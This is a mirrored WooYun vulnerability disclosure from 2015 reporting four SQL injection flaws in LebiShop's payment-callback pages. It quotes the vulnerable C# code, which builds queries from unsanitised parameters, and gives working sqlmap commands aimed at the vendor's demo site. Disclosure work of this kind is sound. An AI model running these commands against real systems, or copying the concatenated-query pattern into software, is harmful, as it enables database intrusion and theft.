乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-05: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-04: 细节向核心白帽子及相关领域专家公开 2015-05-14: 细节向普通白帽子公开 2015-05-24: 细节向实习白帽子公开 2015-06-08: 细节向公众公开
LebiShop商城系统最新版SQL注入 四处 demo站点测试成功
注入一 二 主要漏洞代码一样
http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspxhttp://demo.lebi.cn/onlinepay/95epay/PayResult.aspx
共同源码如下
protected void Page_Load(object sender, EventArgs e){ this.MerNo = HttpContext.Current.Request.Params["MerNo"].ToString(); this.BillNo = HttpContext.Current.Request.Params["BillNo"].ToString(); //没处理 this.Amount = HttpContext.Current.Request.Params["Amount"].ToString(); this.Succeed = HttpContext.Current.Request.Params["Succeed"].ToString(); this.Result = HttpContext.Current.Request.Params["Result"].ToString(); this.MD5info = HttpContext.Current.Request.Params["MD5info"].ToString(); this.MerRemark = HttpContext.Current.Request.Params["MerRemark"].ToString(); Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.BillNo); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); }.....public static Lebi_OnlinePay GetOnlinePay(string code){ return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入了 }
注入三
http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx
源码如下
protected void Page_Load(object sender, EventArgs E){ Lebi_OnlinePay onlinePay = Money.GetOnlinePay(base.Request["orderId"].ToString().Trim()); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); }....public static Lebi_OnlinePay GetOnlinePay(string code){ return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //没处理 同样存在注入}
注入四
http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx
protected void Page_Load(object sender, EventArgs e){ try { string str = base.Request.Form["txn_id"].ToString(); string str2 = base.Request.Form["payment_status"].ToString(); string str3 = base.Request.Form["payment_date"].ToString(); string str4 = base.Request.Form["item_name"].ToString(); string str5 = base.Request.Form["mc_gross"].ToString(); string code = base.Request.Form["item_number"].ToString(); //没处理 Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); //跟进 if (onlinePay == null) { base.Response.Write("系统错误"); base.Response.End(); } else { B_Lebi_Currency.GetModel(onlinePay.Currency_id); string str7 = ""; str7 = (((((str7 + "txn_id:" + str + "<br>") + "payment_status:" + str2 + "<br>") + "payment_date:" + str3 + "<br>") + "item_name:" + str4 + "<br>") + "mc_gross:" + str5 + "<br>") + "ppitem_number:" + code + "<br>"; if (this.VerifyIPN()) { Order.OnlinePaySuccess(code, "", true); } } } catch (Exception) { }}public static Lebi_OnlinePay GetOnlinePay(string code){ return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'")); //存在注入}
注入一 二sqlmap扫描
sqlmap -u "http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx" --data "MerNo=1&Amount=1&Succeed=1&Result=1&MD5info=1&MerRemark=1&BillNo=1" -p "BillNo" --dbms "mssql" --current-db --technique=T --time-sec 10
注入三sqlmap扫描
sqlmap -u "http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx" --data "orderId=1" -p "orderId" --dbms "mssql" --current-db --technique=T --time-sec 10
注入四sqlmap扫描
sqlmap -u "http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx" --data "txn_id=1&payment_status=1&payment_date=1&item_name=1&mc_gross=1&item_number=1" -p "item_number" --dbms "mssql" --current-db --technique=T --time-sec 10
对参数进行处理
危害等级:无影响厂商忽略
忽略时间:2015-06-08 11:33
暂无
